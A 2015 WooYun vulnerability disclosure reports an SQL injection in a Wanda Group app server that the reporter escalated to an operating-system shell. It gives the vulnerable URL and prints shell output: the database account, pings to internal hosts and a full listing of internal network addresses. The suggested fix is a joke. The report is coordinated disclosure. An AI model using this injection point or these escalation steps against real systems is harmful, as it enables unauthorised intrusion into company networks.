当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152935

漏洞标题:万达集团app云端主站SQL注入os-shell

相关厂商:大连万达集团股份有限公司

漏洞作者: zzR

提交时间:2015-11-09 10:09

修复时间:2015-12-24 17:48

公开时间:2015-12-24 17:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

万达集团官方app云端主站sql注入,shell,可通ww.wanda.cn/www.wandafilm.com/www.baidu.com。
另外,老板,再来两个月会员!

详细说明:

万达集团app 官方ios版
信息泄露的同时,存在sql注入,可shell,可通www.wanda.cn/www.wandafilm.com/www.baidu.com
http://app.wanda.cn/KidsReport/OA/RevenueDailydlYueReport.aspx?cpname=%E5%8C%85%E5%A4%B4%E4%B9%90%E5%9B%AD&datee=2015%E5%B9%B402%E6%9C%88
注入链接
http://app.wanda.cn/KidsReport/OATest/RevenueDailydlYueReport.aspx?cpname=%E5%8C%85%E5%A4%B4%E4%B9%90%E5%9B%AD&datee=2015%E5%B9%B402%E6%9C%88 (GET)

漏洞证明:

QQ截图20151109095548.png


os-shell 内网地址可通官网,电影院线官网

QQ截图20151109100400.png


command standard output:    'wanda\kids_dbadmin'
command standard output:
---
正在 Ping www.wanda.cn [10.199.130.155] 具有 32 字节的数据:
来自 10.199.130.155 的回复: 字节=32 时间=1ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248

10.199.130.155 的 Ping 统计信息:
\?a0\?a0\?a0数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
\?a0\?a0\?a0最短 = 1ms,最长 = 2ms,平均 = 1ms


正在 Ping www.wanda.cn [10.199.130.155] 具有 32 字节的数据:
来自 10.199.130.155 的回复: 字节=32 时间=1ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=1ms TTL=248
来自 10.199.130.155 的回复: 字节=32 时间=2ms TTL=248
---
command standard output:
---
正在 Ping www.wandafilm.com [10.199.1.2] 具有 32 字节的数据:
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=6ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248

10.199.1.2 的 Ping 统计信息:
\?a0\?a0\?a0数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
\?a0\?a0\?a0最短 = 2ms,最长 = 6ms,平均 = 3ms


正在 Ping www.wandafilm.com [10.199.1.2] 具有 32 字节的数据:
来自 10.199.1.2 的回复: 字节=32 时间=5ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=4ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=7ms TTL=248
来自 10.199.1.2 的回复: 字节=32 时间=2ms TTL=248
---
command standard output:
---
正在 Ping www.a.shifen.com [220.181.111.188] 具有 32 字节的数据:
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50

220.181.111.188 的 Ping 统计信息:
\?a0\?a0\?a0数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
\?a0\?a0\?a0最短 = 10ms,最长 = 10ms,平均 = 10ms


正在 Ping www.a.shifen.com [220.181.111.188] 具有 32 字节的数据:
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
来自 220.181.111.188 的回复: 字节=32 时间=10ms TTL=50
---
command standard output:
---
Windows IP 配置


以太网适配器 本地连接* 9:

\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :
\?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::b1b2:aa4c:f308:dd89
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 169.254.1.154
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.0.0
\?a0\?a0默认网关. . . . . . . . . . . . . :

以太网适配器 本地连接 5:

\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :
\?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::c82d:3567:7d0b:21b2
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 10.199.180.12
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 10.199.180.14
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 10.199.180.15
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
\?a0\?a0默认网关. . . . . . . . . . . . . : 10.199.180.1

以太网适配器 HB1:

\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 192.168.1.1
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
\?a0\?a0默认网关. . . . . . . . . . . . . :

以太网适配器 HB2:

\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 192.168.2.1
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.255.0
\?a0\?a0默认网关. . . . . . . . . . . . . :

隧道适配器 isatap.{72186596-9C5E-43BB-AC30-E420B6F901C8}:

\?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{62A2B96C-184C-4BA7-AD3B-722F260213D7}:

\?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{2F03E182-FE26-4B21-9D46-9829730077B9}:

\?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{E3573A4C-D91D-4EF5-BFA8-93F73AA45A3F}:

\?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 Teredo Tunneling Pseudo-Interface:

\?a0\?a0媒体状态 \?a0. . . . . . . . . . . . : 媒体已断开
\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :


Windows IP 配置


以太网适配器 本地连接* 9:

\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :
\?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::b1b2:aa4c:f308:dd89
\?a0\?a0IPv4 地址 . . . . . . . . . . . . : 169.254.1.154
\?a0\?a0子网掩码 \?a0. . . . . . . . . . . . : 255.255.0.0
\?a0\?a0默认网关. . . . . . . . . . . . . :

以太网适配器 本地连接 5:

\?a0\?a0连接特定的 DNS 后缀 . . . . . . . :
\?a0\?a0本地链接 IPv6 地址. . . . . . . . : fe80::c82d:35


网卡也不少,不深入了

修复方案:

你的月亮我的心

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-09 17:46

厂商回复:

感谢zzR同学的关注与贡献,马上通知业务整改。

最新状态:

暂无